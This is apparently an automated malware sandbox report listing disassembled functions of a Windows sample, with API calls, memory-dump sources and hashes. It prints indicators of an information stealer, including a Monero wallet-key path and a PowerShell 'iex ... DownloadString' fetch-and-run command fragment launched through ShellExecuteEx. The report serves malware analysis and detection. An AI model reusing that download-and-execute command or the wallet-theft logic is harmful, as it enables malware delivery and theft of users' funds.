                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                      • String ID:
                      • API String ID: 2311089104-0
                      • Opcode ID: 3d13d8fd507baefae289455cd62817672d3aebf37edf7f47b8a06663be775385
                      • Instruction ID: df3d59a202742af4ccf28076af59925a0c6e5ed668dd2522d7278315e45681b0
                      • Opcode Fuzzy Hash: 3d13d8fd507baefae289455cd62817672d3aebf37edf7f47b8a06663be775385
                      • Instruction Fuzzy Hash: 803148B4A0020DEFDB24CF95D885BAE77F4FF48304F108168E915AB280D774AA91CFA0
                      Function 00EF4780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                      Download Yara Rule
                      APIs
                      • lstrcat.KERNEL32(?,0168DFF8), ref: 00EF47DB
                        • Part of subcall function 00EF8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00EF8E0B
                      • lstrcat.KERNEL32(?,00000000), ref: 00EF4801
                      • lstrcat.KERNEL32(?,?), ref: 00EF4820
                      • lstrcat.KERNEL32(?,?), ref: 00EF4834
                      • lstrcat.KERNEL32(?,0167AFB8), ref: 00EF4847
                      • lstrcat.KERNEL32(?,?), ref: 00EF485B
                      • lstrcat.KERNEL32(?,0168D640), ref: 00EF486F
                        • Part of subcall function 00EFA740: lstrcpy.KERNEL32(00F00E17,00000000), ref: 00EFA788
                        • Part of subcall function 00EF8D90: GetFileAttributesA.KERNEL32(00000000,?,00EE1B54,?,?,00F0564C,?,?,00F00E1F), ref: 00EF8D9F
                        • Part of subcall function 00EF4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00EF4580
                        • Part of subcall function 00EF4570: RtlAllocateHeap.NTDLL(00000000), ref: 00EF4587
                        • Part of subcall function 00EF4570: wsprintfA.USER32 ref: 00EF45A6
                        • Part of subcall function 00EF4570: FindFirstFileA.KERNEL32(?,?), ref: 00EF45BD
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                      • String ID:
                      • API String ID: 2540262943-0
                      • Opcode ID: e5ae8e53c804b9e0f57c8e44b2f3fce202aa7451bffa66c8f86811375e63f2b4
                      • Instruction ID: ae1ee02e23564e89d09ebf0c714f635f90a245e9cb9049a13d1be801940c7d3b
                      • Opcode Fuzzy Hash: e5ae8e53c804b9e0f57c8e44b2f3fce202aa7451bffa66c8f86811375e63f2b4
                      • Instruction Fuzzy Hash: 2A3161B690021C67CB28FBA0DC85EF973BCAB48700F405599F319A6085EEB4D6D9CB91
                      Function 00EF2C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00EFA740: lstrcpy.KERNEL32(00F00E17,00000000), ref: 00EFA788
                        • Part of subcall function 00EFA9B0: lstrlen.KERNEL32(?,016888F8,?,\Monero\wallet.keys,00F00E17), ref: 00EFA9C5
                        • Part of subcall function 00EFA9B0: lstrcpy.KERNEL32(00000000), ref: 00EFAA04
                        • Part of subcall function 00EFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EFAA12
                        • Part of subcall function 00EFA920: lstrcpy.KERNEL32(00000000,?), ref: 00EFA972
                        • Part of subcall function 00EFA920: lstrcat.KERNEL32(00000000), ref: 00EFA982
                        • Part of subcall function 00EFA8A0: lstrcpy.KERNEL32(?,00F00E17), ref: 00EFA905
                      • ShellExecuteEx.SHELL32(0000003C), ref: 00EF2D85
                      Strings
                      • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00EF2CC4
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00EF2D04
                      • <, xrefs: 00EF2D39
                      • ')", xrefs: 00EF2CB3
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                      • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      • API String ID: 3031569214-898575020
                      • Opcode ID: 3ec8da7039d37ebfc2e4e18f1b7a208d802bbb45263e46b02fe77a2689521433
                      • Instruction ID: 73a99bcb051dfb050a34c323765d69a197bba18350a81816e7603beec128a020
                      • Opcode Fuzzy Hash: 3ec8da7039d37ebfc2e4e18f1b7a208d802bbb45263e46b02fe77a2689521433
                      • Instruction Fuzzy Hash: 5B41F2B1C0014C9ADB18EFA0D855BFDB7B4AF50340F449039E60ABB195DFB46A4ADF91
                      Function 00EE9E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                      Download Yara Rule
                      APIs
                      • LocalAlloc.KERNEL32(00000040,?), ref: 00EE9F41
                        • Part of subcall function 00EFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EFA7E6
                        • Part of subcall function 00EFA740: lstrcpy.KERNEL32(00F00E17,00000000), ref: 00EFA788
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$AllocLocal
                      • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                      • API String ID: 4171519190-1096346117
                      • Opcode ID: 063a3f81983fdeec645e1412e2278484d3c56c9ab6566efe5dd2fb54b0c58efc
                      • Instruction ID: 68e311fa3f9dc9e84db46a68865bbc27e11a2ec69312c6f870d625f23c301c65
                      • Opcode Fuzzy Hash: 063a3f81983fdeec645e1412e2278484d3c56c9ab6566efe5dd2fb54b0c58efc
                      • Instruction Fuzzy Hash: B0614071A0028CEBDB28EFA5CC96FED77B5AF44340F049028FA096F191DB746A45CB52
                      Function 00EF40B0 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON
                      Download Yara Rule
                      APIs
                      • RegOpenKeyExA.ADVAPI32(80000001,0168D7A0,00000000,00020119,?), ref: 00EF40F4
                      • RegQueryValueExA.ADVAPI32(?,0168DED8,00000000,00000000,00000000,000000FF), ref: 00EF4118
                      • RegCloseKey.ADVAPI32(?), ref: 00EF4122
                      • lstrcat.KERNEL32(?,00000000), ref: 00EF4147
                      • lstrcat.KERNEL32(?,0168DF50), ref: 00EF415B
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$CloseOpenQueryValue
                      • String ID:
                      • API String ID: 690832082-0
                      • Opcode ID: 28b2f1f485b4a95e0a23db9d8d9ddabb820b5ab7f777797500f82f6777d1e75e
                      • Instruction ID: f004fd835e0ab8a9bc5a4ada432016b0669ce246a473d7812533a3daa71d1084
                      • Opcode Fuzzy Hash: 28b2f1f485b4a95e0a23db9d8d9ddabb820b5ab7f777797500f82f6777d1e75e
                      • Instruction Fuzzy Hash: 3F4165B690020C6BDB38EFA0EC46FFE737DAB88300F004558A72557185EA759BD88B91
                      Function 00EF6920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                      Download Yara Rule
                      APIs
                      • GetSystemTime.KERNEL32(?), ref: 00EF696C
                      • sscanf.NTDLL ref: 00EF6999
                      • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00EF69B2
                      • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00EF69C0
                      • ExitProcess.KERNEL32 ref: 00EF69DA
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Time$System$File$ExitProcesssscanf
                      • String ID:
                      • API String ID: 2533653975-0
                      • Opcode ID: bcbc8d9915b45a8e4aa41e892fbff8f8a6077f322e5cca067468ae2c24a9169b
                      • Instruction ID: 49913c80ba7888b2e680e29c790318c38c7d716f0ccec4bdc2b2cba85e94fe66
                      • Opcode Fuzzy Hash: bcbc8d9915b45a8e4aa41e892fbff8f8a6077f322e5cca067468ae2c24a9169b
                      • Instruction Fuzzy Hash: 6521D8B5D0020CABCB18EFE4E9459EEB7B9FF48300F04852AE516B3244EB745614CB69
                      Function 00EF7E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EF7E37
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00EF7E3E
                      • RegOpenKeyExA.ADVAPI32(80000002,0167BA08,00000000,00020119,?), ref: 00EF7E5E
                      • RegQueryValueExA.ADVAPI32(?,0168D600,00000000,00000000,000000FF,000000FF), ref: 00EF7E7F
                      • RegCloseKey.ADVAPI32(?), ref: 00EF7E92
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                      • String ID:
                      • API String ID: 3225020163-0
                      • Opcode ID: fdeb6e09404aeddf20c25bc1f93b5da6431fe47f5bc7f020fff1c3caf5fedb79
                      • Instruction ID: 3fec070b3a1afbe2482f35d4ae44503ba58479001ebcbaa2b4923701e66a2397
                      • Opcode Fuzzy Hash: fdeb6e09404aeddf20c25bc1f93b5da6431fe47f5bc7f020fff1c3caf5fedb79
                      • Instruction Fuzzy Hash: AB1191B1A44209FBD728CF94ED49FBBBBB8FB04711F10412AF715A7684D77459108BA0
                      Function 00EF9260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                      Download Yara Rule
                      APIs
                      • StrStrA.SHLWAPI(0168DC20,?,?,?,00EF140C,?,0168DC20,00000000), ref: 00EF926C
                      • lstrcpyn.KERNEL32(0112AB88,0168DC20,0168DC20,?,00EF140C,?,0168DC20), ref: 00EF9290
                      • lstrlen.KERNEL32(?,?,00EF140C,?,0168DC20), ref: 00EF92A7
                      • wsprintfA.USER32 ref: 00EF92C7
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpynlstrlenwsprintf
                      • String ID: %s%s
                      • API String ID: 1206339513-3252725368
                      • Opcode ID: 5a82e37c100241b3a087bcb05c80c6ee7b71cbbf6522361dd0f8e178dd05996b
                      • Instruction ID: 4e0398cb6d731fc5f850a8f0b5a0bc7210f055fcd75346ae3e847c168d9a9af6
                      • Opcode Fuzzy Hash: 5a82e37c100241b3a087bcb05c80c6ee7b71cbbf6522361dd0f8e178dd05996b
                      • Instruction Fuzzy Hash: 0E01E575500108FFCB18DFE8E984EAE7BB9EF48354F108548F90A9B605C631AAA0DB90
                      Function 00EE12A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EE12B4
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00EE12BB
                      • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00EE12D7
                      • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00EE12F5
                      • RegCloseKey.ADVAPI32(?), ref: 00EE12FF
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                      • String ID:
                      • API String ID: 3225020163-0
                      • Opcode ID: 8c243e83daa747443c46899e391a879b643be00fdba020e5e9461a599edc68bb
                      • Instruction ID: a806c879c2e387b04da45d57e4d4e7eddf616dc551e451a4188ceee7247ea885
                      • Opcode Fuzzy Hash: 8c243e83daa747443c46899e391a879b643be00fdba020e5e9461a599edc68bb
                      • Instruction Fuzzy Hash: DE0136B5A40208BBDB24DFD0EC49FAEB7B8FF48701F008155FB1597284D6719A518F50
                      Function 00EFC84E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: String___crt$Type
                      • String ID:
                      • API String ID: 2109742289-3916222277
                      • Opcode ID: 29d7baa47246bbd757c4c9ac3e25d668c80008a463fcd54b6257974252c37478
                      • Instruction ID: 64349a62cc4c401072e8dd94476c2c25ec212d06792f26927230dabd3ab4aa64
                      • Opcode Fuzzy Hash: 29d7baa47246bbd757c4c9ac3e25d668c80008a463fcd54b6257974252c37478
                      • Instruction Fuzzy Hash: 0E41097110079C5EDB258B24CD84FFB7BED9F45708F3454E8EACAA6182D2719A44DF60
                      Function 00EF6630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                      Download Yara Rule
                      APIs
                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00EF6663
                        • Part of subcall function 00EFA740: lstrcpy.KERNEL32(00F00E17,00000000), ref: 00EFA788
                        • Part of subcall function 00EFA9B0: lstrlen.KERNEL32(?,016888F8,?,\Monero\wallet.keys,00F00E17), ref: 00EFA9C5
                        • Part of subcall function 00EFA9B0: lstrcpy.KERNEL32(00000000), ref: 00EFAA04
                        • Part of subcall function 00EFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EFAA12
                        • Part of subcall function 00EFA8A0: lstrcpy.KERNEL32(?,00F00E17), ref: 00EFA905
